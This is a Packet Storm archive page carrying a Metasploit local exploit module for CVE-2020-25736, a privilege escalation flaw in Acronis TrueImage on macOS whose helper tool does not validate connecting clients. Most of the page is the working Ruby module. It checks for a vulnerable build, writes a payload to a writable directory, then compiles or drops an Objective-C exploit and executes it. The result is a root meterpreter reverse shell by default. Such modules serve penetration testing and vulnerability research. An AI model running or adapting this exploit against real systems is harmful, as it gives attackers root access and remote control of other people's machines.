exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Acronis TrueImage XPC Privilege Escalation

Acronis TrueImage XPC Privilege Escalation
Posted Dec 15, 2022
Authored by Csaba Fitzl, Shelby Pace | Site metasploit.com

Acronis TrueImage versions 2019 update 1 through 2021 update 1 are vulnerable to privilege escalation. The com.acronis.trueimagehelper helper tool does not perform any validation on connecting clients, which gives arbitrary clients the ability to execute functions provided by the helper tool with root privileges.

tags | exploit, arbitrary, root
advisories | CVE-2020-25736
SHA-256 | 64e516f7e243343a09b0c147d3a167346d6cd74cc8c16dba1cb067a60cd06847

Acronis TrueImage XPC Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Post::Common
include Msf::Post::Process
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Acronis TrueImage XPC Privilege Escalation',
'Description' => %q{
Acronis TrueImage versions 2019 update 1 through 2021 update 1
are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`
helper tool does not perform any validation on connecting clients,
which gives arbitrary clients the ability to execute functions provided
by the helper tool with `root` privileges.
},
'License' => MSF_LICENSE,
'Author' => [
'Csaba Fitzl', # @theevilbit - Vulnerability Discovery
'Shelby Pace' # Metasploit Module and Objective-c code
],
'Platform' => [ 'osx' ],
'Arch' => [ ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' => [
[ 'CVE', '2020-25736' ],
[ 'URL', 'https://kb.acronis.com/content/68061' ],
[ 'URL', 'https://attackerkb.com/topics/a1Yrvagxt5/cve-2020-25736' ]
],
'DefaultOptions' => {
'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp',
'WfsDelay' => 15
},
'DisclosureDate' => '2020-11-11',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE_SESSION ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
}
)
)

register_options([
OptString.new('WRITABLE_DIR', [ true, 'Writable directory to write the payload to', '/tmp' ]),
OptString.new('SHELL', [ true, 'Shell to use for executing payload', '/bin/zsh' ]),
OptEnum.new('COMPILE', [ true, 'Compile exploit on target', 'Auto', [ 'Auto', 'True', 'False' ] ])
])
end

def tmp_dir
datastore['WRITABLE_DIR'].to_s
end

def sys_shell
datastore['SHELL'].to_s
end

def compile
datastore['COMPILE']
end

def compile_on_target?
return false if compile == 'False'

if compile == 'Auto'
ret = cmd_exec('xcode-select -p')
return false if ret.include?('error: unable')
end

true
end

def exp_file_name
@exp_file_name ||= Rex::Text.rand_text_alpha(5..10)
end

def check
helper_location = '/Library/PrivilegedHelperTools'
helper_svc_names = [ 'com.acronis.trueimagehelper', 'com.acronis.helpertool' ]
plist = '/Applications/Acronis True Image.app/Contents/Info.plist'

unless helper_svc_names.any? { |svc_name| file?("#{helper_location}/#{svc_name}") }
return CheckCode::Safe
end

return CheckCode::Detected('Service found, but cannot determine version via plist') unless file?(plist)

plutil_cmd = "plutil -extract CFBundleVersion raw \'#{plist}\'"
build_no = cmd_exec(plutil_cmd)
return CheckCode::Detected('Could not retrieve build number from plist') if build_no.blank?

build_no = build_no.to_i
vprint_status("Found build #{build_no}")
return CheckCode::Appears('Vulnerable build found') if build_no > 14170 && build_no < 33610

CheckCode::Safe('Acronis version found is not vulnerable')
end

def exploit
payload_name = Rex::Text.rand_text_alpha(7)
@payload_path = "#{tmp_dir}/#{payload_name}"

print_status("Attempting to write payload at #{@payload_path}")
unless upload_and_chmodx(@payload_path, generate_payload_exe)
fail_with(Failure::BadConfig, 'Failed to write payload. Consider changing WRITABLE_DIR option.')
end
vprint_good("Successfully wrote payload at #{@payload_path}")

@pid = get_valid_pid
exp_bin_path = "#{tmp_dir}/#{exp_file_name}"

if compile_on_target?
exp_src = "#{exp_file_name}.m"
exp_path = "#{tmp_dir}/#{exp_src}"
compile_cmd = "gcc -framework Foundation #{exp_path} -o #{exp_bin_path}"

unless write_file(exp_path, objective_c_code)
fail_with(Failure::BadConfig, 'Failed to write Objective-C exploit to disk. WRITABLE_DIR may need to be changed')
end
register_files_for_cleanup(@payload_path, exp_path, exp_bin_path)

ret = cmd_exec(compile_cmd)
fail_with(Failure::UnexpectedReply, "Failed to compile #{exp_src}") unless ret.blank?

print_status("Successfully compiled #{exp_src}...Now executing payload")
else
print_status("Using pre-compiled exploit #{exp_bin_path}")
compiled_exploit = compiled_exp
unless upload_and_chmodx(exp_bin_path, compiled_exploit)
fail_with(Failure::BadConfig, 'Failed to write compiled exploit. Consider changing WRITABLE_DIR option.')
end

register_files_for_cleanup(exp_bin_path, @payload_path)
end

cmd_exec(exp_bin_path)
end

def objective_c_code
file_contents = exploit_data('CVE-2020-25736', 'acronis-exp.erb')
ERB.new(file_contents).result(binding)
rescue Errno::ENOENT
fail_with(Failure::NotFound, 'ERB payload file not found')
end

def compiled_exp
compiled = exploit_data('CVE-2020-25736', 'acronis-exp.macho')
compiled.gsub!('/tmp/payload', @payload_path)
compiled.gsub!('/bin/zsh', sys_shell)
compiled.gsub!("\xEF\xBE\xAD\xDE".force_encoding('ASCII-8BIT'), [@pid.to_i].pack('V'))

compiled
end

def get_valid_pid
procs = get_processes
return '1' if procs.empty?

len = procs.length
rand_proc = procs[rand(1...len)]
return '1' if rand_proc['pid'].to_s.blank?

rand_proc['pid'].to_s
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close